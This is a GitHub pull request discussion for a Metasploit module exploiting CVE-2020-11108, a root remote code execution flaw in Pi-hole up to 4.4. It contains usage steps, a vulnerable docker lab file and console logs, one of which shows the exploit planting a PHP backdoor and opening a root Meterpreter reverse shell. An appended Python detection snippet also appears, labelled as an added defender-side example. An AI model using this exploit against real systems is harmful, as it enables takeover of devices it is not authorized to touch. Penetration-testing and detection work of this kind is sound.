
Pi-Hole <= 4.4 root RCE CVE-2020-11108 #13445

Merged (10 commits), May 18, 2020

Conversation

@h00die (Contributor) commented May 13, 2020

Root exploit against Pi-Hole <= 4.4 for CVE-2020-11108.

Verified against 4.3.2, (modified code) and 4.4.

A few notes:

  1. The writeup mentioned you should just run (our) web server on port 80. When putting in the blocklist w/ a different port, the various encodings muck with it before it gets to the RCE point. I didn't attempt to make this work.
  2. Originally attempted to use /stage1 and /stage2 on the URLs for the blacklist, to track which was which. Similar to test #1 something got strange when getting to the RCE point, and it wouldn't work.
  3. teleporter.php gets overwritten. I didn't bother pulling a 'good' one and then re-uploading it on shell.

Verification

Install a vuln pihole

  • Start msfconsole
  • use exploit/unix/http/pihole_blocklist_exec
  • set rhost/srvhost/etc
  • Verify you get a root exploit
  • Document: make sure it's all grammar and spelling and good.

@bcoles (Contributor) left a comment:

Parenthesis will soon be mandatory.

Review comments on modules/exploits/unix/http/pihole_blocklist_exec.rb (outdated, resolved)
@h00die (Contributor, Author) commented May 13, 2020

Negative Test Cases

Correctly identifies 4.4 and 5.0

msf5 exploit(unix/http/pihole_blocklist_exec) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf5 exploit(unix/http/pihole_blocklist_exec) > [-] Version Detected: 4.4
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
check
[-] Version Detected: 5.0
[*] 2.2.2.2:80 - The target is not exploitable.

@h00die (Contributor, Author) commented May 13, 2020

@Frichetten FYI. Do you want an email added to your POC for the exploit?

@Frichetten commented:

Hi @h00die, no thank you. I'm okay with just the link to my blog. If someone really wanted to contact me they could find the info there (I'm always nervous about my email being in plaintext somewhere bots could find it and spam me).

Thank you for taking the time to build an actual Metasploit module for it! I never thought of doing that.

@Frichetten commented:

Also just a heads up that Pi-hole v4.4 is vulnerable. If you like I can take a stab at debugging it and seeing what's up. (Pi-hole Version v4.4, Web Interface Version v4.33, FTL Version v4.3.1)

@h00die (Contributor, Author) commented May 14, 2020

@Frichetten thanks for writing an awesome blog with step by step instructions, and using python so I could actually follow along.

You were right on the 4.4, I adjusted the code a bit and got it working.

h00die changed the title from "Pi-Hole < 4.4 root RCE CVE-2020-11108" to "Pi-Hole <= 4.4 root RCE CVE-2020-11108" (May 14, 2020)
h00die added the label "blocked: Blocked by one or more additional tasks" (May 14, 2020)
@h00die (Contributor, Author) commented May 14, 2020

throwing a delay label on here to investigate authentication

h00die mentioned this pull request (May 14, 2020)
@Frichetten commented:

Interesting. I'm not sure if 3.2.1 has authentication, but 4.4 does. When you install it will set a random one and the user can change it. [image]

A quick/simple fix could be to ask for an authenticated session cookie from the user. Then just set ‘cookie = “PHPSESSID=user cookie”’

@h00die (Contributor, Author) commented May 14, 2020

Should be easy enough to add a password option, then send a POST (or GET then POST for any CSRF/tokens) to authenticate. I'll do a re-install of 3.2.1 and 4.4 and see if I can't find one. Now that the <3.3 exploit is up, I also wanted to do CVE-2020-8816, so a common library for authentication would be nice to have.

@h00die (Contributor, Author) commented May 14, 2020

For notes: Pi-hole 4.4 and 4.3.2 are strange in their logins.
They have no CSRF/token protection. Next, when you hit a page that requires auth, you don't get a redirect; it just gives you the login page content on the URL you specified. You send the POST to log in to ANY URL (or at least I did it to the /admin/settings.php page) even though the traditional login page is /admin/index.php?login. It will then refresh the page with the appropriate content.

This is actually easier than expected, no token grabbing, no processing redirects etc.

@h00die h00die removed the blocked Blocked by one or more additional tasks label May 14, 2020
A Contributor commented on these lines of the module's diff:

    print_status('Adding backdoor reference')
    add_blocklist(backdoor_name, token, cookie)

    # update gravity

Okay, Einstein.

@acammack-r7 (Contributor) left a comment:

Nice module! Some small fixes to avoid nils and creating unneeded regexes.

Review comments on modules/exploits/unix/http/pihole_blocklist_exec.rb (outdated, resolved)
@adfoster-r7 adfoster-r7 self-assigned this May 15, 2020
@adfoster-r7 (Contributor) commented:
Looks like a solid module, should be able to land this later 👍


Running check against 5.0

msf5 exploit(unix/http/pihole_blocklist_exec) > set verbose true
verbose => true
msf5 exploit(unix/http/pihole_blocklist_exec) > check

[-] Version Detected: 5.0
[*] 127.0.0.1:80 - The target is not exploitable.

Running check against 4.3

[+] Version Detected: 4.3
[*] 127.0.0.1:80 - The target appears to be vulnerable.

Running against 4.3 with a valid password

msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3
[*] Using URL: http://192.168.222.1:80/
[*] Using cookie: PHPSESSID=fj7l5goh1hcs2ntmkb8gd3ipg2;
[*] Login required, attempting login.
[*] Using token: f9qnxBv48noc7Ym3wRCc9RDzNm/e51PWkXqZ8PQDgWQ=
[*] Adding backdoor reference
[*] Forcing gravity pull
[*] Received GET request.  Responding
[*] Sending 2nd gravity update request.
[*] Forcing gravity pull
[*] (1/2) Sending priv esc trigger
[*] Adding root reference
[*] Forcing gravity pull
[*] Received GET request.  Responding
[*] Sending 2nd gravity update request.
[*] Forcing gravity pull
[*] (2/2) Sending root payload
[*] Popping root shell
[*] Sending stage (38288 bytes) to 192.168.222.128
[*] Meterpreter session 3 opened (192.168.222.1:4444 -> 192.168.222.128:56936) at 2020-05-15 17:02:39 +0100
[+] Deleted YUQ1KxZP.php
sessions -1
[*] Starting interaction with 3...

meterpreter > 

Running against 4.3 with an invalid password

[*] Using URL: http://192.168.222.1:80/
[*] Using cookie: PHPSESSID=kg1c6gkidtgv9gvutdmo0eefs2;
[*] Login required, attempting login.
[-] Exploit aborted due to failure: bad-config: Incorrect Password
[*] Server stopped.

This was my docker-compose file:

docker-compose.yml
version: "3"

# More info at https://github.com/pi-hole/docker-pi-hole/ and https://docs.pi-hole.net/
services:
  pihole:
    container_name: pihole
    image: pihole/pihole:4.3
    ports:
#      - "53:53/tcp"
#      - "53:53/udp"
#      - "67:67/udp"
      - "80:80/tcp"
#      - "443:443/tcp"
    environment:
      TZ: 'America/Chicago'
      WEBPASSWORD: 'password123'
    # Volumes store your data between container upgrades
    #volumes:
    #   - './etc-pihole/:/etc/pihole/'
    #   - './etc-dnsmasq.d/:/etc/dnsmasq.d/'
    dns:
      - 127.0.0.1
      - 1.1.1.1
    # Recommended but not required (DHCP needs NET_ADMIN)
    #   https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped

@h00die (Contributor, Author) commented May 15, 2020

I'm hoping to write a 3rd pihole exploit in the next day or two. May make a cool weekly summary if all 3 land the same week 😉

@adfoster-r7 adfoster-r7 merged commit c019c06 into rapid7:master May 18, 2020
@adfoster-r7 (Contributor) commented May 18, 2020

Release Notes

This adds a root exploit for Pi-Hole, versions 4.4 and lower. This takes advantage of CVE-2020-11108. A new blocklist is added then an update is forced to pull in the blocklist content. Then PHP content is written to a file within webroot.
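A defender-side companion to the flow in these release notes, added here as an example (it is not part of the Metasploit module or of Pi-hole): it flags adlist entries that do not look like plain blocklist URLs (non-standard ports or shell/PHP metacharacters, the two things the thread says the payload needs) and lists .php files in the admin web root that are absent from a known-good baseline. The adlist lines, the web-root listing and the baseline are constructed sample data; on a real host they would be read from the deployment's own config and web-root paths, which are not assumed here.

```python
"""Checks for the Pi-hole <= 4.4 blocklist abuse (CVE-2020-11108).
Constructed example; not part of the Metasploit module or Pi-hole."""
import re
from urllib.parse import urlsplit

# Shell- and PHP-relevant characters that do not belong in a plain blocklist URL.
# '&' and '?' are deliberately allowed: legitimate lists use query strings.
SUSPICIOUS = re.compile(r"[\s;|`$<>'\"]|<\?")


def adlist_entry_problems(entry):
    """Return the reasons one adlist line looks unlike a plain blocklist URL."""
    entry = entry.strip()
    if not entry or entry.startswith("#"):
        return []                      # blank lines and comments are fine
    problems = []
    parts = urlsplit(entry)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        problems.append("not an http(s) URL")
    try:
        port = parts.port
    except ValueError:                 # e.g. "host:abc" or an out-of-range port
        port = None
        problems.append("unparseable port")
    if port not in (None, 80, 443):    # thread notes the payload only works on port 80
        problems.append("non-standard port %d" % port)
    found = SUSPICIOUS.search(entry)
    if found:
        problems.append("suspicious token %r" % found.group(0))
    return problems


def unexpected_php_files(listing, baseline):
    """Return .php names in a web-root listing that are not in the baseline."""
    return sorted(n for n in listing
                  if n.lower().endswith(".php") and n not in baseline)


# Constructed sample input: adlist lines and a listing of the admin web root.
SAMPLE_ADLIST = [
    "https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts",
    "http://198.51.100.7:8000/hosts.txt",    # served from a non-standard port
    "http://198.51.100.7/hosts.txt; id",     # shell metacharacters in a URL
]
SAMPLE_WEBROOT = ["index.php", "settings.php", "teleporter.php", "YUQ1KxZP.php", "style.css"]
KNOWN_PHP = {"index.php", "settings.php", "teleporter.php"}

if __name__ == "__main__":
    for line in SAMPLE_ADLIST:
        print(line, "->", adlist_entry_problems(line) or "ok")
    print("unexpected PHP files:", unexpected_php_files(SAMPLE_WEBROOT, KNOWN_PHP))
```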

@h00die h00die deleted the pihole branch May 20, 2020 20:06
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label May 28, 2020